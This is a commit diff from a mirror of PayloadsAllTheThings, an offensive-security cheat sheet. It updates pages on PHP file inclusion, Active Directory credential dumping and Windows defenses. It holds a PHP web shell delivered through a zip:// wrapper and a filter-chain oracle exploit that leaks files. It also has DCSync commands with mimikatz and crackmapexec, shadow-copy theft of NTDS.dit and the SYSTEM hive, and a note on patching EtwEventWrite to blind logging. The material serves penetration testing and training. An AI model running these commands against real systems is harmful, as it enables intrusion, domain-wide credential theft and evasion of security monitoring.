mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
LFI iconv and dechunk + ETW + NTDS Dump Rework
This commit is contained in:
parent
dd0c23f9a2
commit
fddd094ee1
3 changed files with 92 additions and 113 deletions
|
@ -21,11 +21,12 @@
|
||||||
- [Bypass allow_url_include](#bypass-allow_url_include)
|
- [Bypass allow_url_include](#bypass-allow_url_include)
|
||||||
- [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
- [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||||
- [Wrapper php://filter](#wrapper-phpfilter)
|
- [Wrapper php://filter](#wrapper-phpfilter)
|
||||||
- [Wrapper zip://](#wrapper-zip)
|
|
||||||
- [Wrapper data://](#wrapper-data)
|
- [Wrapper data://](#wrapper-data)
|
||||||
- [Wrapper expect://](#wrapper-expect)
|
- [Wrapper expect://](#wrapper-expect)
|
||||||
- [Wrapper input://](#wrapper-input)
|
- [Wrapper input://](#wrapper-input)
|
||||||
|
- [Wrapper zip://](#wrapper-zip)
|
||||||
- [Wrapper phar://](#wrapper-phar)
|
- [Wrapper phar://](#wrapper-phar)
|
||||||
|
- [Wrapper iconv:// and dechunk://](#wrapper-iconv-and-dechunk)
|
||||||
- [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
|
- [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
|
||||||
- [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
|
- [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
|
||||||
- [LFI to RCE via upload](#lfi-to-rce-via-upload)
|
- [LFI to RCE via upload](#lfi-to-rce-via-upload)
|
||||||
|
@ -173,18 +174,6 @@ Also there is a way to turn the `php://filter` into a full RCE.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Wrapper zip://
|
|
||||||
|
|
||||||
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
|
|
||||||
2. Zip the file
|
|
||||||
```python
|
|
||||||
zip payload.zip payload.php;
|
|
||||||
mv payload.zip shell.jpg;
|
|
||||||
rm payload.php
|
|
||||||
```
|
|
||||||
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
|
||||||
|
|
||||||
|
|
||||||
### Wrapper data://
|
### Wrapper data://
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -217,6 +206,17 @@ Alternatively, Kadimus has a module to automate this attack.
|
||||||
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
|
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Wrapper zip://
|
||||||
|
|
||||||
|
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
|
||||||
|
2. Zip the file
|
||||||
|
```python
|
||||||
|
zip payload.zip payload.php;
|
||||||
|
mv payload.zip shell.jpg;
|
||||||
|
rm payload.php
|
||||||
|
```
|
||||||
|
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
||||||
|
|
||||||
|
|
||||||
### Wrapper phar://
|
### Wrapper phar://
|
||||||
|
|
||||||
|
@ -252,6 +252,32 @@ include('phar://test.phar');
|
||||||
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
|
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
|
||||||
|
|
||||||
|
|
||||||
|
### Wrapper iconv:// and dechunk://
|
||||||
|
|
||||||
|
The goal is to leak the content of a file, one character at a time.
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
- Backend must not use `file_exists` or `is_file`.
|
||||||
|
- Vulnerable parameter should be in a `POST` request.
|
||||||
|
- You can't leak more than 135 characters in a GET request due to the size limit
|
||||||
|
|
||||||
|
The exploit chain is based on PHP filters: `iconv` and `dechunk`:
|
||||||
|
|
||||||
|
1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error.
|
||||||
|
2. Use the `dechunk` filter to determine the first character of the file, based on the previous error.
|
||||||
|
3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one.
|
||||||
|
|
||||||
|
Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0
|
||||||
|
[*] The following URL is targeted : http://127.0.0.1
|
||||||
|
[*] The following local file is leaked : /test
|
||||||
|
[*] Running POST requests
|
||||||
|
[+] File /test leak is finished!
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## LFI to RCE via /proc/*/fd
|
## LFI to RCE via /proc/*/fd
|
||||||
|
|
||||||
1. Upload a lot of shells (for example : 100)
|
1. Upload a lot of shells (for example : 100)
|
||||||
|
@ -483,4 +509,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
||||||
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
|
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
|
||||||
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
|
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
|
||||||
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
||||||
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
||||||
|
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
|
||||||
|
|
|
@ -30,14 +30,9 @@
|
||||||
- [Abuse GPO with PowerView](#abuse-gpo-with-powerview)
|
- [Abuse GPO with PowerView](#abuse-gpo-with-powerview)
|
||||||
- [Abuse GPO with StandIn](#abuse-gpo-with-standin)
|
- [Abuse GPO with StandIn](#abuse-gpo-with-standin)
|
||||||
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
||||||
- [Using ndtsutil](#using-ndtsutil)
|
- [DCSync Attack](#dcsync-attack)
|
||||||
- [Using Vshadow](#using-vshadow)
|
- [Volume Shadow Copy](#volume-shadow-copy)
|
||||||
- [Using vssadmin](#using-vssadmin)
|
|
||||||
- [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
|
|
||||||
- [Using esentutl.exe](#using-esentutlexe)
|
|
||||||
- [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
|
- [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
|
||||||
- [Alternatives - modules](#alternatives---modules)
|
|
||||||
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
|
||||||
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
||||||
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
||||||
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
||||||
|
@ -1259,72 +1254,44 @@ However you can change the location to a custom one, you will need to query the
|
||||||
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
|
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Using ndtsutil
|
### DCSync Attack
|
||||||
|
|
||||||
```powershell
|
DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
|
||||||
C:\>ntdsutil
|
|
||||||
ntdsutil: activate instance ntds
|
|
||||||
ntdsutil: ifm
|
|
||||||
ifm: create full c:\pentest
|
|
||||||
ifm: quit
|
|
||||||
ntdsutil: quit
|
|
||||||
```
|
|
||||||
|
|
||||||
or
|
* DCSync only one user
|
||||||
|
```powershell
|
||||||
|
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
|
||||||
|
```
|
||||||
|
* DCSync all users of the domain
|
||||||
|
```powershell
|
||||||
|
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
|
||||||
|
|
||||||
```powershell
|
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
|
||||||
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi
|
||||||
```
|
```
|
||||||
|
|
||||||
### Using Vshadow
|
> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts.
|
||||||
|
|
||||||
```powershell
|
|
||||||
vssadmin create shadow /for=C :
|
|
||||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
|
||||||
```
|
|
||||||
|
|
||||||
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
### Volume Shadow Copy
|
||||||
|
|
||||||
```powershell
|
The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process.
|
||||||
Import-Module .\Copy-VSS.ps1
|
|
||||||
Copy-VSS
|
|
||||||
Copy-VSS -DestinationDir C:\ShadowCopy\
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using vssadmin
|
* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin)
|
||||||
|
```powershell
|
||||||
|
vssadmin create shadow /for=C:
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
||||||
|
```
|
||||||
|
* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files)
|
||||||
|
```powershell
|
||||||
|
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
||||||
|
```
|
||||||
|
* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit)
|
||||||
|
```powershell
|
||||||
|
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
|
||||||
vssadmin create shadow /for=C:
|
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using DiskShadow (a Windows signed binary)
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
diskshadow.txt contains :
|
|
||||||
set context persistent nowriters
|
|
||||||
add volume c: alias someAlias
|
|
||||||
create
|
|
||||||
expose %someAlias% z:
|
|
||||||
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
|
|
||||||
delete shadows volume %someAlias%
|
|
||||||
reset
|
|
||||||
|
|
||||||
then:
|
|
||||||
NOTE - must be executed from C:\Windows\System32
|
|
||||||
diskshadow.exe /s c:\diskshadow.txt
|
|
||||||
dir c:\exfil
|
|
||||||
reg.exe save hklm\system c:\exfil\system.bak
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using esentutl.exe
|
|
||||||
|
|
||||||
Copy/extract a locked file such as the AD Database
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
|
||||||
```
|
|
||||||
|
|
||||||
### Extract hashes from ntds.dit
|
### Extract hashes from ntds.dit
|
||||||
|
|
||||||
|
@ -1344,40 +1311,6 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||||
* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
|
* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
|
||||||
* `-user-status`: Display whether or not the user is disabled.
|
* `-user-status`: Display whether or not the user is disabled.
|
||||||
|
|
||||||
### Alternatives - modules
|
|
||||||
|
|
||||||
Metasploit modules
|
|
||||||
|
|
||||||
```c
|
|
||||||
windows/gather/credentials/domain_hashdump
|
|
||||||
```
|
|
||||||
|
|
||||||
PowerSploit module
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
|
||||||
```
|
|
||||||
|
|
||||||
CrackMapExec module
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
|
||||||
cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using Mimikatz DCSync
|
|
||||||
|
|
||||||
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# DCSync only one user
|
|
||||||
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
|
|
||||||
|
|
||||||
# DCSync all users of the domain
|
|
||||||
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
|
|
||||||
```
|
|
||||||
|
|
||||||
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
|
|
||||||
|
|
||||||
### Using Mimikatz sekurlsa
|
### Using Mimikatz sekurlsa
|
||||||
|
|
||||||
|
|
|
@ -11,6 +11,7 @@
|
||||||
* [Script Block Logging](#script-block-logging)
|
* [Script Block Logging](#script-block-logging)
|
||||||
* [Protected Process Light](#protected-process-light)
|
* [Protected Process Light](#protected-process-light)
|
||||||
* [Credential Guard](#credential-guard)
|
* [Credential Guard](#credential-guard)
|
||||||
|
* [Event Tracing for Windows](#event-tracing-for-windows)
|
||||||
* [Windows Defender Antivirus](#windows-defender-antivirus)
|
* [Windows Defender Antivirus](#windows-defender-antivirus)
|
||||||
* [Windows Defender Application Control](#windows-defender-application-control)
|
* [Windows Defender Application Control](#windows-defender-application-control)
|
||||||
* [Windows Defender Firewall](#windows-defender-firewall)
|
* [Windows Defender Firewall](#windows-defender-firewall)
|
||||||
|
@ -180,6 +181,22 @@ When Credential Guard is enabled, it uses hardware-based virtualization to creat
|
||||||
Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features.
|
Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features.
|
||||||
|
|
||||||
|
|
||||||
|
## Event Tracing for Windows
|
||||||
|
|
||||||
|
ETW (Event Tracing for Windows) is a Windows-based logging mechanism that provides a way to collect and analyze system events and performance data in real-time. ETW allows developers and system administrators to gather detailed information about system performance and behavior, which can be used for troubleshooting, optimization, and security purposes.
|
||||||
|
|
||||||
|
| Name | GUID |
|
||||||
|
|---------------------------------------|----------------------------------------|
|
||||||
|
| Microsoft-Antimalware-Scan-Interface | {2A576B87-09A7-520E-C21A-4942F0271D67} |
|
||||||
|
| Microsoft-Windows-PowerShell | {A0C1853B-5C40-4B15-8766-3CF1C58F985A} |
|
||||||
|
| Microsoft-Antimalware-Protection | {E4B70372-261F-4C54-8FA6-A5A7914D73DA} |
|
||||||
|
| Microsoft-Windows-Threat-Intelligence | {F4E1897C-BB5D-5668-F1D8-040F4D8DD344} |
|
||||||
|
|
||||||
|
The `Microsoft-Windows-Threat-Intelligence` provider corresponds to ETWTI, an additional security feature that an EDR can subscribe to and identify malicious uses of APIs (e.g. process injection).
|
||||||
|
|
||||||
|
The most common bypassing technique is patching the function `EtwEventWrite` which is called to write/log ETW events.
|
||||||
|
|
||||||
|
|
||||||
## Windows Defender Antivirus
|
## Windows Defender Antivirus
|
||||||
|
|
||||||
Also known as `Microsoft Defender`.
|
Also known as `Microsoft Defender`.
|
||||||
|
@ -283,4 +300,6 @@ The **Enterprise Context** column shows you what each app can do with your enter
|
||||||
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)
|
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)
|
||||||
* [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - Apr 7, 2021](https://itm4n.github.io/lsass-runasppl/)
|
* [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - Apr 7, 2021](https://itm4n.github.io/lsass-runasppl/)
|
||||||
* [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - 03/10/2023 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context)
|
* [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - 03/10/2023 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context)
|
||||||
* [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - 12/09/2022 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate)
|
* [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - 12/09/2022 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate)
|
||||||
|
* [DISABLING AV WITH PROCESS SUSPENSION - March 24, 2023 - By Christopher Paschen ](https://www.trustedsec.com/blog/disabling-av-with-process-suspension/)
|
||||||
|
* [Disabling Event Tracing For Windows - UNPROTECT PROJECT - Tuesday 19 April 2022](https://unprotect.it/technique/disabling-event-tracing-for-windows-etw/)
|
Loading…
Reference in a new issue